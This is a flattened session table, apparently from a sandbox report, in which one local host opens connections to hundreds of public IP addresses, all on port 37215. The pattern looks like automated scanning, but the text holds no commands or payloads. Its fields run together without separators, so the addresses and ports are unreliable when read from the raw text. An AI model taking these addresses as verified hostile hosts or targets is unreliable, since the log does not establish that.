                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9223192.168.2.1533370138.110.156.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9224192.168.2.155925637.64.118.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9225192.168.2.1549822186.45.109.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9226192.168.2.1542744157.128.181.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9227192.168.2.1546296102.41.19.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9228192.168.2.1552168197.157.208.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9229192.168.2.1548768186.165.23.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9230192.168.2.154141045.10.46.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9231192.168.2.153294694.139.53.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9232192.168.2.154084645.147.118.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9233192.168.2.1560946121.38.168.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9234192.168.2.155833037.6.147.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9235192.168.2.1537776186.212.172.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9236192.168.2.1533818102.209.74.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9237192.168.2.1544134143.220.105.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9238192.168.2.155684631.157.107.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9239192.168.2.1532856222.73.109.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9240192.168.2.155728045.10.124.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9241192.168.2.155534698.3.183.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9242192.168.2.155335445.38.137.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9243192.168.2.1557716122.151.14.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9244192.168.2.1534060156.122.146.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9245192.168.2.1556692197.166.2.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9246192.168.2.154187441.204.233.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9247192.168.2.153877641.94.174.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9248192.168.2.1557184197.54.144.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9249192.168.2.153637841.154.59.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9250192.168.2.1536080190.126.39.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9251192.168.2.1560738190.0.99.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9252192.168.2.1533894156.158.75.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9253192.168.2.1559430186.45.196.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9254192.168.2.1535204222.17.59.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9255192.168.2.1542882190.18.230.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9256192.168.2.1541658122.34.38.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9257192.168.2.155075894.206.207.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9258192.168.2.1540890138.103.242.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9259192.168.2.154588441.93.134.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9260192.168.2.1546226122.97.127.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9261192.168.2.1555790121.52.93.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9262192.168.2.1548418121.24.116.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9263192.168.2.1542684222.40.116.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9264192.168.2.1552556122.10.89.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9265192.168.2.1539168197.15.226.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9266192.168.2.1543078138.228.10.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9267192.168.2.1549594138.166.67.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9268192.168.2.154624441.110.133.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9269192.168.2.1538526102.252.220.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9270192.168.2.153569637.87.31.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9271192.168.2.1546692138.38.120.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9272192.168.2.1543990132.102.209.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9273192.168.2.155399637.126.76.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9274192.168.2.1546014122.43.238.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9275192.168.2.1557126186.62.210.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9276192.168.2.1544938186.78.254.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9277192.168.2.1535110197.9.67.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9278192.168.2.1542010138.255.183.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9279192.168.2.154456241.44.237.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9280192.168.2.1547370156.113.163.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9281192.168.2.1546442122.17.51.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9282192.168.2.154925237.244.91.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9283192.168.2.1542948122.220.212.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9284192.168.2.1552460122.164.244.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9285192.168.2.1544808197.158.100.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9286192.168.2.153667664.168.251.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9287192.168.2.1548506202.51.87.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9288192.168.2.154328218.93.153.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9289192.168.2.1545600156.145.126.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9290192.168.2.155697431.84.77.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9291192.168.2.1549958186.48.23.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9292192.168.2.1538446157.58.27.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9293192.168.2.1543366186.117.171.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9294192.168.2.1534110156.245.99.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9295192.168.2.154011241.192.40.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9296192.168.2.1537434121.85.148.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9297192.168.2.1546660190.37.16.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9298192.168.2.1536230121.108.98.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9299192.168.2.1552360156.71.71.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9300192.168.2.1539098157.171.61.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9301192.168.2.154789294.234.67.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9302192.168.2.1539758197.6.231.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9303192.168.2.1540040222.217.140.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9304192.168.2.1550514157.131.109.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9305192.168.2.1553228156.212.27.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9306192.168.2.1545504102.83.251.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9307192.168.2.1534310157.18.68.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9308192.168.2.154245431.235.83.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9309192.168.2.153773237.250.86.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9310192.168.2.1550130156.192.26.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9311192.168.2.1532790138.108.28.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9312192.168.2.155207831.227.113.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9313192.168.2.154704437.207.157.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9314192.168.2.1556256157.2.253.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9315192.168.2.1533450222.21.201.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9316192.168.2.153434231.122.52.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9317192.168.2.155987441.181.254.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9318192.168.2.1534586181.142.66.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9319192.168.2.1534072122.223.196.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9320192.168.2.1535752190.174.231.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9321192.168.2.1533454186.86.74.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9322192.168.2.153287045.234.48.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9323192.168.2.1559882222.78.19.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9324192.168.2.155838645.17.15.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9325192.168.2.1536684197.103.188.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9326192.168.2.1535432197.20.178.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9327192.168.2.1552258222.33.248.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9328192.168.2.1548764197.20.119.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9329192.168.2.1546544181.172.27.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9330192.168.2.156027841.163.206.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9331192.168.2.1559170154.178.190.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9332192.168.2.155395294.86.113.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9333192.168.2.1550650102.42.135.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9334192.168.2.1547364181.18.201.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9335192.168.2.1549156102.4.248.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9336192.168.2.1544032181.59.28.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9337192.168.2.1543688121.91.70.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9338192.168.2.1538408121.255.193.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9339192.168.2.155857631.128.188.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9340192.168.2.155825037.188.43.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9341192.168.2.1546106222.27.193.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9342192.168.2.153663887.194.21.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9343192.168.2.1546810190.95.84.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9344192.168.2.1553156121.144.37.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9345192.168.2.1544870102.157.178.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9346192.168.2.1548434122.188.75.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9347192.168.2.155617841.20.234.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9348192.168.2.156037241.6.198.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9349192.168.2.1536928121.49.160.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9350192.168.2.154475694.58.245.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9351192.168.2.1552426222.219.153.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9352192.168.2.1537210102.113.228.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9353192.168.2.1538852157.150.210.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9354192.168.2.1539380222.125.47.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9355192.168.2.155577445.147.106.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9356192.168.2.155924845.39.108.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9357192.168.2.156039694.64.206.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9358192.168.2.1550658138.215.156.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9359192.168.2.1534416156.113.107.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9360192.168.2.1558604156.127.123.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9361192.168.2.1559046197.153.230.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9362192.168.2.156094037.45.139.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9363192.168.2.153646441.73.25.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9364192.168.2.1543578138.43.199.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9365192.168.2.1534620122.192.62.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9366192.168.2.155336241.109.63.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9367192.168.2.1555092222.188.143.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9368192.168.2.154010841.23.155.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9369192.168.2.1539234190.23.11.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9370192.168.2.1551968197.21.140.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9371192.168.2.1544682138.217.3.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9372192.168.2.1560792138.191.17.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9373192.168.2.154603845.233.78.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9374192.168.2.1548576186.39.164.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9375192.168.2.1545138181.187.73.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9376192.168.2.1546654190.192.185.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9377192.168.2.155932231.78.251.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9378192.168.2.153878294.216.246.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9379192.168.2.1557132222.228.77.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9380192.168.2.1554758138.32.240.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9381192.168.2.155962894.206.13.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9382192.168.2.1538552197.78.144.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9383192.168.2.1535764121.8.205.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9384192.168.2.1540768156.207.166.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9385192.168.2.1532892181.106.210.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9386192.168.2.1548230222.123.222.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9387192.168.2.1533716102.201.138.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9388192.168.2.1544738122.89.24.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9389192.168.2.1557044102.63.42.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9390192.168.2.153625694.35.202.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9391192.168.2.1540356121.125.1.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9392192.168.2.154606437.165.201.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9393192.168.2.1535864181.152.32.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9394192.168.2.1560708222.102.20.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9395192.168.2.1548844190.15.120.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9396192.168.2.1556058197.89.21.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9397192.168.2.155700041.70.22.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9398192.168.2.1552104102.220.182.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9399192.168.2.1541414121.228.203.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9400192.168.2.1541176197.168.0.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9401192.168.2.1542766157.26.111.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9402192.168.2.1535910181.35.126.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9403192.168.2.154570241.120.232.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9404192.168.2.1537426105.71.189.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9405192.168.2.153507831.87.246.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9406192.168.2.1533262104.92.230.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9407192.168.2.154086031.166.203.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9408192.168.2.1535550186.115.46.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9409192.168.2.1542108190.12.252.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9410192.168.2.1550650122.67.206.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9411192.168.2.155017641.221.26.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9412192.168.2.1557836223.36.214.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9413192.168.2.1543434197.64.238.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9414192.168.2.1545754157.152.75.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9415192.168.2.1547066128.165.243.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9416192.168.2.154049841.42.154.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9417192.168.2.1538330121.129.165.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9418192.168.2.1533690138.188.195.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9419192.168.2.1558358190.187.5.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9420192.168.2.1548824186.46.171.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9421192.168.2.1537746222.217.43.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9422192.168.2.1554086138.177.12.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9423192.168.2.153890831.134.126.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9424192.168.2.1550822122.203.185.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9425192.168.2.155819437.124.6.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9426192.168.2.1549980181.122.135.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9427192.168.2.154426245.15.177.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9428192.168.2.1560082190.110.127.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9429192.168.2.1550170222.249.25.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9430192.168.2.155500831.131.236.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9431192.168.2.1555988157.251.27.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9432192.168.2.1558456222.228.155.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9433192.168.2.1552712190.26.129.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9434192.168.2.1548746192.63.162.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9435192.168.2.1536698138.151.91.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9436192.168.2.155497831.203.100.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9437192.168.2.1560486122.107.0.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9438192.168.2.1559002102.1.151.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9439192.168.2.154330812.26.141.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9440192.168.2.1538102181.187.140.16237215
                                              TimestampBytes transferredDirectionData


